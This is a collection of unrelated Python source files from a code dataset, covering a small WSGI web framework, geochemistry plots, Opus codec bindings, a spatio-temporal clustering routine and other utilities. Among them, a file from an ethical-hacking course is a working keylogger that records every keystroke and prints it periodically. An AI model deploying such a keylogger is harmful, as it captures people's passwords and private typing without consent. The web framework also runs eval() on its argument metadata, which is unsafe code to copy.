uri = env['PATH_INFO']
qs = env['QUERY_STRING']
work_n = None
args = []
if env['REQUEST_METHOD'] == 'GET' :
page = uri.split('#',1)[0]
if page != '/' :
start_response( '404 NOT FOUND', [] )
#yield resp.get( 'body', '' )
return
elif env['REQUEST_METHOD'] == 'POST' :
clen = int(env['CONTENT_LENGTH'])
req = json.loads( env['wsgi.input'].read(clen) )
if req['event'] == 'onload' :
page = ( uri.split('#',1)+[''] )[1] if 'uri' not in req else \
urlparse(req['uri']).fragment
print page
if page != '' :
page = page.split('/')
work_n, args = page[0], page[1:]
#work = self.methods[work_n]
else :
work_n = ''
else :
work_n = req['python']
args = []
else :
raise Exception, 'not supported'
work = self.methods[work_n]
rtmk = self.respmakers[ self.methods_meta[work_n]['showtype'] ]
resp = rtmk( work( None, *args ) )
start_response( '200 OK', [] )
yield resp
if work_n is None :
return
yield '''document.getElementById('toptitle').innerHTML = '%s';''' \
% ( str(self.methods_meta[work_n].get('name', work_n )), )
if req['event'] == 'onload' :
return
yield '''window.location.href=window.location.href+"%s";''' \
%( str(work_n), )
showargs = self.methods_meta[work_n].get( "arguments", {} )
showargs = self.make_args( showargs )
yield '''document.getElementById('argbar').innerHTML = '%s';''' \
% ( showargs.encode('string_escape'), )
def make_args( self, args ):
r = [ getattr(self,'arg_'+v[''] )( k, v ) for k, v in args.items() ]
r = [ '<dl>\n<dt>%s</dt><dd>%s\n</dd></dl>' % ( k, i )
for k, i in zip(args.keys(), r)]
r = '\n'.join(r)
return r
def arg_dropdownlist( self, name, arg ):
items = eval( arg['items'] )
default = eval( arg.get( 'default','None') )
r = [ '<option value="%s" %s >%s</option>' \
% ( i, 'selected="selected"' if i == default else '', i)
for i in items ]
r = '\n'.join(r)
r = ( '<select name="%s">\n' % (name,) ) + r + '\n</select>'
return r
def arg_selectlist( self, name, arg ):
items = eval( arg['items'] )
_its = [ ( name+'_'+str(idx), i ) for idx, i in enumerate(items) ]
r = [ '<div><input type="checkbox" id="%s" name="%s" value="%s" /><label for="%s">%s</lable></div>' \
% ( idx, name, i, idx, i )
for idx, i in _its ]
r = '\n'.join(r)
#r = ( '<dl>\n<dt>%s</dt><dd>' % (name,) ) + r + '\n</dd></dl>'
return r
def arg_text( self, name, arg ):
default = eval( arg.get( 'default','""') )
r = '<input type="text" name="%s" value="%s" />' % ( name, default)
return r
def serve( self, port, engine = '' ):
if engine == '' :
from wsgiref.simple_server import make_server
httpd = make_server( '', port, self.run )
print "Serving HTTP on port %d..." % ( port, )
# Respond to requests until process is killed
httpd.serve_forever()
return
elif engine == 'flup.fastcgi' :
from flup.server.fcgi_fork import WSGIServer
# Respond to requests until process is killed
            WSGIServer( self.run , bindAddress=port ).run()
return
raise Exception, 'unsupported engine.'
def main_page( self, user ):
'''
showtype: html
'''
return self.mp
def _web_default( self, user ):
'''
showtype: text
'''
return "hello world"
def resp_html( self, r ):
return r
def resp_raw( self, r ):
if type(r) == type(u''):
r = r.encode('utf-8')
if type(r) != type(''):
r = str(r)
return '''document.getElementById('contentzone').innerHTML = '%s';''' \
% ( r.encode('string_escape'), )
def resp_text( self, r ):
if type(r) == type(u''):
            r = r.encode('utf-8')
if type(r) != type(''):
r = str(r)
r = xml.sax.saxutils.escape(r)
return '''document.getElementById('contentzone').innerHTML = '%s';''' \
% ( r.encode('string_escape'), )
def resp_table( self, r ):
r = eprint.Table( r, attr={"cellSpacing":0} ).htmlformat()
return self.resp_raw(r)
class EasyWebTest( EasyWeb ):
def web_test( self, user ):
'''
arguments:
input1: dropdownlist
items: ['table','list']
default: 'table'
input2: text
default: 'hello'
input3: selectlist
items: [1,2,3,4,5,6,7,8,9]
showtype: text
'''
return
def web_test2( self, user ):
'''
showtype: table
name: hello world
group: Hello
'''
d = [ { 'colA' : 'A.1.alpha\r\nA.1.beta' ,
'colB' : [1,2],
'colC' : 'B.1.alpha\r\nB.1.beta\r\nB.1.gamma\r\nB.1.delta',
},
{ 'colA' : 'A.2.alpha\r\nA.2.beta' ,
'colB' : [0.1,0.9,0.3,0,-1],
'colC' : [3,0.7,{'B.2.alpha':'z','B.1':'qew' },True,False],
},
]
return d
def web_test3( self, user ):
'''
showtype: text
name: sleep 1 sec
group: Hello
'''
import time
time.sleep(1)
        return 'server slept 1 sec'
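    # Hypothetical extra handler (illustration only, not part of the original
    # file): the 'raw' showtype sends the returned string through resp_raw, so
    # it is rendered as HTML in the content zone.
    def web_test4( self, user ):
        '''
        showtype: raw
        name: raw html demo
        group: Hello
        '''
        return '<b>hello from raw html</b>'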
if __name__ == '__main__' :
t = EasyWebTest()
#print t.methods
t.serve(1088)
| StarcoderdataPython |
1618444 | # -*- coding:utf-8 -*-
# Create by 27
# @Time : 2020/3/1 02:23
__author__ = '27'
class NoneLocal:
def __init__(self, v):
self.v = v
n = NoneLocal(1)
| StarcoderdataPython |
1746803 | <filename>sztuczna_inteligencja/1-lab/picture_row.py
def howManyHaveToFlip(list, windowSize):
oneSymbol = 1
leastFlips = len(list)
OnesInList = 0
for x in list:
if x == oneSymbol:
OnesInList += 1
OnesInWindow = 0
for i in range(windowSize):
if list[i] == oneSymbol:
OnesInWindow += 1
    # evaluate every valid window start position, then slide the window by one
    for i in range(len(list) - windowSize + 1):
        leastFlips = min(
            (windowSize - OnesInWindow) + (OnesInList - OnesInWindow),
            leastFlips
        )
        if i + windowSize < len(list):
            if list[i] == oneSymbol:
                OnesInWindow -= 1
            if list[i + windowSize] == oneSymbol:
                OnesInWindow += 1
return leastFlips
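# Quick sanity checks (hypothetical calls; the expected values assume the
# intended semantics are "fewest flips so that all ones end up inside a single
# window of the given size").
if __name__ == "__main__":
    print(howManyHaveToFlip([0, 1, 0], 1))           # expected: 0
    print(howManyHaveToFlip([1, 0, 1, 1, 0, 1], 4))  # expected: 2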
| StarcoderdataPython |
1621248 | <gh_stars>1-10
from . import (pp, Session)
from ..db.database import get_db
from .base import CRUDBase
from ..models.models_patch import Patch
from ..schemas.schemas_patch import PatchCreate, PatchUpdate
class CRUDPatch(CRUDBase[Patch, PatchCreate, PatchUpdate]):
pass
patch = CRUDPatch(Patch)
| StarcoderdataPython |
108123 | <filename>backend/app/utils/get_param.py
from flask_restful import request, abort
def get_param(param_name, default, is_valid, to_value, error_message):
param_string = request.args.get(param_name)
if param_string is None:
param_string = default
elif not is_valid(param_string):
abort(400, message=error_message)
return to_value(param_string)
def get_string_param(param_name: str, default: str,
valid_words: list[str] = None) -> str:
"""Get query parameter in form of string.
Args:
param_name (str): Name of parameter.
default (str): Default value of parameter.
valid_words (list[str]): List of valid strings.
"""
def is_valid(string): return True
if valid_words is not None:
is_valid = valid_words.__contains__
def to_value(string): return string
error_message = 'problem with query'
if valid_words is not None:
error_message = f'{param_name} should be: ' + ', '.join(valid_words)
return get_param(param_name, default, is_valid, to_value, error_message)
def get_bool_param(param_name: str, default: bool) -> bool:
"""Get query parameter in form of boolean.
Args:
param_name (str): Name of parameter.
default (bool): Default value of parameter.
"""
default = str(default).lower()
is_valid = ['true', 'false'].__contains__
def to_value(string): return string == "true"
error_message = f'{param_name} should be "true" or "false"'
return get_param(param_name, default, is_valid, to_value, error_message)
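# Hypothetical usage inside a flask_restful Resource (illustration only; the
# resource class and query-string names below are made up):
#
#     class ItemList(Resource):
#         def get(self):
#             order = get_string_param('order', 'asc', ['asc', 'desc'])
#             verbose = get_bool_param('verbose', False)
#             limit = get_int_param('limit', 20)   # helper defined below
#             ...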
def get_int_param(param_name: str, default: int) -> int:
"""Get query parameter in form of integer.
Args:
param_name (str): Name of parameter.
default (int): Default value of parameter.
"""
default = str(default)
is_valid = str.isdigit
to_value = int
error_message = f'{param_name} should be an integer'
return get_param(param_name, default, is_valid, to_value, error_message) | StarcoderdataPython |
1720235 | <gh_stars>10-100
"""
Reference Compositions
=======================
This page presents the range of compositions within the reference composition database
accessible within :mod:`pyrolite`. It's currently a work in progress, but will soon
contain extended descriptions and notes for some of the compositions and associated
references.
"""
import matplotlib.pyplot as plt
from pyrolite.geochem.norm import all_reference_compositions, get_reference_composition
# sphinx_gallery_thumbnail_number = 11
refcomps = all_reference_compositions()
norm = "Chondrite_PON" # a constant composition to normalise to
########################################################################################
# Chondrites
# -----------
#
fltr = lambda c: c.reservoir == "Chondrite"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Mantle
# -------
#
# Primitive Mantle & Pyrolite
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir in ["PrimitiveMantle", "BSE"]
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Depleted Mantle
# ~~~~~~~~~~~~~~~~
#
fltr = lambda c: ("Depleted" in c.reservoir) & ("Mantle" in c.reservoir)
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Mid-Ocean Ridge Basalts (MORB)
# -------------------------------
#
#
# Average MORB, NMORB
# ~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir in ["MORB", "NMORB"]
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
#
# Enriched MORB
# ~~~~~~~~~~~~~
#
fltr = lambda c: "EMORB" in c.reservoir
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Ocean Island Basalts
# --------------------
#
fltr = lambda c: "OIB" in c.reservoir
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Continental Crust
# -----------------
#
# Bulk Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "BulkContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Upper Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "UpperContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Mid-Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "MidContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Lower Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "LowerContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Shales
# ------
#
fltr = lambda c: "Shale" in c.reservoir
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Composition List
# -----------------
#
# |refcomps|
#
# .. seealso::
#
# Examples:
# `Normalisation <../examples/geochem/normalization.html>`__
#
| StarcoderdataPython |
1607158 | <reponame>carlsummer/python_developer_tools
# !/usr/bin/env python
# -- coding: utf-8 --
# @Author zengxiaohui
# Datatime:4/29/2021 8:41 PM
# @File:time_utils
import datetime
import time
def get_time_stamp():
"""获取毫秒级的时间"""
ct = time.time()
local_time = time.localtime(ct)
data_head = time.strftime("%Y-%m-%d %H:%M:%S", local_time)
data_secs = (ct - int(ct)) * 1000
time_stamp = "%s.%03d" % (data_head, data_secs)
return time_stamp
def str2datetime(dd):
"""
    # Convert a str to a datetime, for example:
dd = '2019-03-17 11:00:00'
dd = datetime.datetime.strptime(dd, "%Y-%m-%d %H:%M:%S")
print(dd,type(dd))
"""
return datetime.datetime.strptime(dd, "%Y-%m-%d %H:%M:%S")
def datetime2str(mtime):
"""datetime格式转str"""
return mtime.strftime("%Y-%m-%d %H:%M:%S") | StarcoderdataPython |
4841837 | <gh_stars>1-10
from scipy.fft import fft, fftfreq
import numpy as np
from scipy import signal
import matplotlib.pyplot as plt
from scipy.signal import hann
# Number of sample points
N = 1024
# sample spacing
Fs = 48000
T = 1.0 / Fs
#X axis
x = np.linspace(0.0, N*T, N, endpoint=False)
#Signal
y = np.cos(2.0*np.pi*x*5000)
#Window
w = hann(N)
#FFT of signal without window
yf = fft(y)
#FFT of signal with window
ywf = fft(y*w)
# Used to calculate bins
# We only grab the first half of the bins
# because we don't need the negative frequencies
xf = np.arange(0,Fs/2,Fs/N)
plt.semilogy(xf[0:int(N/2)], 2.0/N * np.abs(yf[0:int(N/2)]), '-b')
plt.semilogy(xf[0:int(N/2)], 2.0/N * np.abs(ywf[0:int(N/2)]), '-r')
plt.legend(['FFT without Window', 'FFT with Window'])
plt.grid()
plt.show()
| StarcoderdataPython |
3221156 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""High-level interface to a opus decoder functions"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2012, SvartalF'
__license__ = 'BSD 3-Clause License'
import opuslib.api.decoder
import opuslib.api.encoder
import opuslib.api.ctl
import opuslib.constants
class Decoder(object):
def __init__(self, fs, channels):
"""
Parameters:
fs : sampling rate
channels : number of channels
"""
self._fs = fs
self._channels = channels
self._state = opuslib.api.decoder.create(fs, channels)
def __del__(self):
if hasattr(self, '_state'):
# Destroying state only if __init__ completed successfully
opuslib.api.decoder.destroy(self._state)
def reset_state(self):
"""
Resets the codec state to be equivalent to a freshly initialized state
"""
        opuslib.api.decoder.ctl(
            self._state, opuslib.api.ctl.reset_state)
def decode(self, data, frame_size, decode_fec=False):
return opuslib.api.decoder.decode(
self._state, data, len(data), frame_size, decode_fec,
channels=self._channels)
def decode_float(self, data, frame_size, decode_fec=False):
return opuslib.api.decoder.decode_float(
self._state, data, len(data), frame_size, decode_fec,
channels=self._channels)
# CTL interfaces
    _get_final_range = lambda self: opuslib.api.decoder.ctl(
        self._state, opuslib.api.ctl.get_final_range)
final_range = property(_get_final_range)
    _get_bandwidth = lambda self: opuslib.api.decoder.ctl(
        self._state, opuslib.api.ctl.get_bandwidth)
bandwidth = property(_get_bandwidth)
    _get_pitch = lambda self: opuslib.api.decoder.ctl(
        self._state, opuslib.api.ctl.get_pitch)
pitch = property(_get_pitch)
    _get_lsb_depth = lambda self: opuslib.api.decoder.ctl(
        self._state, opuslib.api.ctl.get_lsb_depth)
    _set_lsb_depth = lambda self, x: opuslib.api.decoder.ctl(
        self._state, opuslib.api.ctl.set_lsb_depth, x)
lsb_depth = property(_get_lsb_depth, _set_lsb_depth)
    _get_gain = lambda self: opuslib.api.decoder.ctl(
        self._state, opuslib.api.ctl.get_gain)
    _set_gain = lambda self, x: opuslib.api.decoder.ctl(
        self._state, opuslib.api.ctl.set_gain, x)
gain = property(_get_gain, _set_gain)
class Encoder(object):
def __init__(self, fs, channels, application):
"""
Parameters:
fs : sampling rate
channels : number of channels
"""
if application in opuslib.constants.APPLICATION_TYPES_MAP.keys():
application = opuslib.constants.APPLICATION_TYPES_MAP[application]
elif application in opuslib.constants.APPLICATION_TYPES_MAP.values():
pass # Nothing to do here
else:
raise ValueError(
"`application` value must be in 'voip', 'audio' or "
"'restricted_lowdelay'")
self._fs = fs
self._channels = channels
self._application = application
self._state = opuslib.api.encoder.create(fs, channels, application)
def __del__(self):
if hasattr(self, '_state'):
# Destroying state only if __init__ completed successfully
opuslib.api.encoder.destroy(self._state)
def reset_state(self):
"""
Resets the codec state to be equivalent to a freshly initialized state
"""
opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.reset_state)
def encode(self, data, frame_size):
return opuslib.api.encoder.encode(
self._state, data, frame_size, len(data))
def encode_float(self, data, frame_size, decode_fec=False):
return opuslib.api.encoder.encode_float(
self._state, data, frame_size, len(data))
# CTL interfaces
_get_final_range = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_final_range)
final_range = property(_get_final_range)
_get_bandwidth = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_bandwidth)
bandwidth = property(_get_bandwidth)
_get_pitch = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_pitch)
pitch = property(_get_pitch)
_get_lsb_depth = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_lsb_depth)
_set_lsb_depth = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_lsb_depth, x)
lsb_depth = property(_get_lsb_depth, _set_lsb_depth)
_get_complexity = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_complexity)
_set_complexity = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_complexity, x)
complexity = property(_get_complexity, _set_complexity)
_get_bitrate = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_bitrate)
_set_bitrate = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_bitrate, x)
bitrate = property(_get_bitrate, _set_bitrate)
_get_vbr = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_vbr)
_set_vbr = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_vbr, x)
vbr = property(_get_vbr, _set_vbr)
_get_vbr_constraint = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_vbr_constraint)
_set_vbr_constraint = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_vbr_constraint, x)
vbr_constraint = property(_get_vbr_constraint, _set_vbr_constraint)
_get_force_channels = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_force_channels)
_set_force_channels = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_force_channels, x)
force_channels = property(_get_force_channels, _set_force_channels)
_get_max_bandwidth = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_max_bandwidth)
_set_max_bandwidth = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_max_bandwidth, x)
max_bandwidth = property(_get_max_bandwidth, _set_max_bandwidth)
_set_bandwidth = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_bandwidth, x)
bandwidth = property(None, _set_bandwidth)
_get_signal = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_signal)
_set_signal = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_signal, x)
signal = property(_get_signal, _set_signal)
_get_application = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_application)
_set_application = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_application, x)
application = property(_get_application, _set_application)
_get_sample_rate = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_sample_rate)
sample_rate = property(_get_sample_rate)
_get_lookahead = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_lookahead)
lookahead = property(_get_lookahead)
_get_inband_fec = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_inband_fec)
_set_inband_fec = lambda self, x: opuslib.api.encoder.ctl(
        self._state, opuslib.api.ctl.set_inband_fec, x)
inband_fec = property(_get_inband_fec, _set_inband_fec)
_get_packet_loss_perc = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_packet_loss_perc)
_set_packet_loss_perc = \
lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_packet_loss_perc, x)
packet_loss_perc = property(_get_packet_loss_perc, _set_packet_loss_perc)
_get_dtx = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_dtx)
_set_dtx = lambda self, x: opuslib.api.encoder.ctl(
        self._state, opuslib.api.ctl.set_dtx, x)
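# Hypothetical round-trip sketch (illustration only, not part of the original
# module): 48 kHz stereo, 20 ms frames (960 samples per channel), silent
# 16-bit PCM input.
if __name__ == '__main__':
    encoder = Encoder(48000, 2, 'audio')
    decoder = Decoder(48000, 2)
    frame_size = 960                        # 20 ms at 48 kHz
    pcm = b'\x00\x00' * frame_size * 2      # one silent frame, 2 channels
    packet = encoder.encode(pcm, frame_size)
    restored = decoder.decode(packet, frame_size)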
| StarcoderdataPython |
1735686 | <reponame>raminjafary/ethical-hacking<filename>src/14 keylogger/keylogger_3.py
#!/usr/bin/python
import pynput.keyboard
import threading
log = ""
def process_key_press(key):
global log
try:
log = log + str(key.char)
except AttributeError:
if key == key.space:
log = log + " "
else:
log = log +" " + str(key) + " "
print (log)
def report():
global log
print (log)
log = ""
timer = threading.Timer(5,report)
timer.start()
keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
with keyboard_listener:
report()
keyboard_listener.join()
| StarcoderdataPython |
17774 | <reponame>HangeZoe/django-todo-list<filename>todolist/wsgi.py
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'todolist.settings')
application = get_wsgi_application()
| StarcoderdataPython |
142254 | <reponame>Wanghp119/py-st-dbscan
from datetime import timedelta
from geopy.distance import great_circle
def st_dbscan(df, spatial_threshold, temporal_threshold, min_neighbors):
"""
Python st-dbscan implementation.
INPUTS:
df={o1,o2,...,on} Set of objects
spatial_threshold = Maximum geographical coordinate (spatial) distance
value
temporal_threshold = Maximum non-spatial distance value
min_neighbors = Minimun number of points within Eps1 and Eps2 distance
OUTPUT:
C = {c1,c2,...,ck} Set of clusters
"""
cluster_label = 0
noise = -1
unmarked = 777777
stack = []
# initialize each point with unmarked
df['cluster'] = unmarked
# for each point in database
for index, point in df.iterrows():
if df.loc[index]['cluster'] == unmarked:
neighborhood = retrieve_neighbors(index, df, spatial_threshold,
temporal_threshold)
if len(neighborhood) < min_neighbors:
df.set_value(index, 'cluster', noise)
else: # found a core point
cluster_label += 1
# assign a label to core point
df.set_value(index, 'cluster', cluster_label)
# assign core's label to its neighborhood
for neig_index in neighborhood:
df.set_value(neig_index, 'cluster', cluster_label)
stack.append(neig_index) # append neighborhood to stack
# find new neighbors from core point neighborhood
while len(stack) > 0:
current_point_index = stack.pop()
new_neighborhood = retrieve_neighbors(
current_point_index, df, spatial_threshold,
temporal_threshold)
# current_point is a new core
if len(new_neighborhood) >= min_neighbors:
for neig_index in new_neighborhood:
neig_cluster = df.loc[neig_index]['cluster']
if all([neig_cluster != noise,
neig_cluster == unmarked]):
# TODO: verify cluster average
# before add new point
df.set_value(neig_index, 'cluster',
cluster_label)
stack.append(neig_index)
return df
def retrieve_neighbors(index_center, df, spatial_threshold, temporal_threshold):
neigborhood = []
center_point = df.loc[index_center]
# filter by time
min_time = center_point['date_time'] - timedelta(seconds=temporal_threshold)
max_time = center_point['date_time'] + timedelta(seconds=temporal_threshold)
df = df[(df['date_time'] >= min_time) & (df['date_time'] <= max_time)]
# filter by distance
for index, point in df.iterrows():
if index != index_center:
distance = great_circle(
(center_point['latitude'], center_point['longitude']),
(point['latitude'], point['longitude'])).meters
if distance <= spatial_threshold:
neigborhood.append(index)
return neigborhood
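# Minimal usage sketch (hypothetical data; the only assumptions are the column
# names the functions above already read ('date_time', 'latitude', 'longitude')
# and a pandas version that still provides DataFrame.set_value, which the
# implementation above relies on).
if __name__ == '__main__':
    import pandas as pd

    points = pd.DataFrame({
        'date_time': pd.to_datetime(['2017-01-01 10:00:00',
                                     '2017-01-01 10:00:30',
                                     '2017-01-01 12:00:00']),
        'latitude': [45.7600, 45.7601, 45.9000],
        'longitude': [4.8400, 4.8401, 4.9000],
    })
    # 500 m spatial threshold, 60 s temporal threshold, at least 1 neighbor
    clustered = st_dbscan(points, 500, 60, 1)
    print(clustered[['latitude', 'longitude', 'cluster']])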
| StarcoderdataPython |
107962 | <gh_stars>1-10
import argparse
import numpy as np
import os
import pandas as pd
def main(num_tasks_all,
datasets,
algorithms,
num_seeds,
num_init_tasks,
num_epochs,
save_frequency,
results_root):
if len(num_tasks_all) == 1:
num_tasks_all = num_tasks_all * len(datasets)
if isinstance(datasets, str):
datasets = [datasets]
if isinstance(algorithms, str):
algorithms = [algorithms]
name_order = {'ER Dynamic': 0,
'ER Compositional': 1,
'ER Joint': 2,
'ER Nocomponents': 3,
'EWC Dynamic': 4,
'EWC Compositional': 5,
'EWC Joint': 6,
'EWC Nocomponents': 7,
'VAN Dynamic': 8,
'VAN Compositional': 9,
'VAN Joint': 10,
'VAN Nocomponents': 11,
'FM Dynamic': 12,
'FM Compositional': 13}
version_map = {'Dynamic': 'Dyn. + Comp.',
'Compositional': 'Compositional',
'Joint': 'Joint',
'Nocomponents': 'No Comp.'}
ylabel_map = {'acc': 'Accuracy', 'loss': 'Loss'}
jumpstart_vals_all_datasets = {}
finetuning_vals_all_datasets = {}
forward_transfer_vals_all_datasets = {}
final_vals_all_datasets = {}
jumpstart_errs_all_datasets = {}
finetuning_errs_all_datasets = {}
forward_transfer_errs_all_datasets = {}
final_errs_all_datasets = {}
for i, dataset in enumerate(datasets):
num_tasks = num_tasks_all[i]
jumpstart_vals = {}
finetuning_vals = {}
forward_transfer_vals = {}
final_vals = {}
jumpstart_vals_all_algos = {}
finetuning_vals_all_algos = {}
forward_transfer_vals_all_algos = {}
final_vals_all_algos = {}
jumpstart_errs_all_algos = {}
finetuning_errs_all_algos = {}
forward_transfer_errs_all_algos = {}
final_errs_all_algos = {}
names = []
for algorithm in algorithms:
jumpstart_vals[algorithm] = {}
finetuning_vals[algorithm] = {}
forward_transfer_vals[algorithm] = {}
final_vals[algorithm] = {}
for seed in range(num_seeds):
iter_cnt = 0
prev_components = 4
for task_id in range(num_tasks):
results_dir = os.path.join(results_root, dataset, algorithm, 'seed_{}'.format(seed), 'task_{}'.format(task_id))
if 'dynamic' in algorithm and task_id >= num_init_tasks:
with open(os.path.join(results_dir, 'num_components.txt')) as f:
line = f.readline()
curr_components = int(line.lstrip('final components: '))
keep_component = curr_components > prev_components
prev_components = curr_components
with open(os.path.join(results_dir, 'log.txt')) as f:
##### JUMPSTART #########
next(f)
for task in range(task_id):
next(f)
line = f.readline()
line = line.rstrip('\n')
i_0 = len('\ttask: {}\t'.format(task_id))
while i_0 != -1:
i_f = line.find(':', i_0)
key = line[i_0 : i_f]
if task_id == 0 and seed == 0:
jumpstart_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
finetuning_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
forward_transfer_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
final_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
if key not in jumpstart_vals_all_algos:
jumpstart_vals_all_algos[key] = []
finetuning_vals_all_algos[key] = []
forward_transfer_vals_all_algos[key] = []
final_vals_all_algos[key] = []
jumpstart_errs_all_algos[key] = []
finetuning_errs_all_algos[key] = []
forward_transfer_errs_all_algos[key] = []
final_errs_all_algos[key] = []
if key not in jumpstart_vals_all_datasets:
jumpstart_vals_all_datasets[key] = []
finetuning_vals_all_datasets[key] = []
forward_transfer_vals_all_datasets[key] = []
final_vals_all_datasets[key] = []
jumpstart_errs_all_datasets[key] = []
finetuning_errs_all_datasets[key] = []
forward_transfer_errs_all_datasets[key] = []
final_errs_all_datasets[key] = []
i_0 = line.find(key + ': ', i_0) + len(key + ': ')
i_f = line.find('\t', i_0)
substr = line[i_0 : i_f] if i_f != -1 else line[i_0:]
try:
val = float(substr)
except:
if keep_component:
val = float(substr.split(',')[0].lstrip('('))
else:
val = float(substr.split(',')[1].rstrip(')'))
jumpstart_vals[algorithm][key][seed, task_id] = val
i_0 = i_f if i_f == - 1 else i_f + 1
if task_id < num_init_tasks - 1:
continue
###### IGNORE FINTEUNING PROCESS #########
if '_compositional' in algorithm or '_dynamic' in algorithm:
stop_at = num_epochs - save_frequency
else:
stop_at = num_epochs
for epoch in range(1, stop_at, save_frequency):
try:
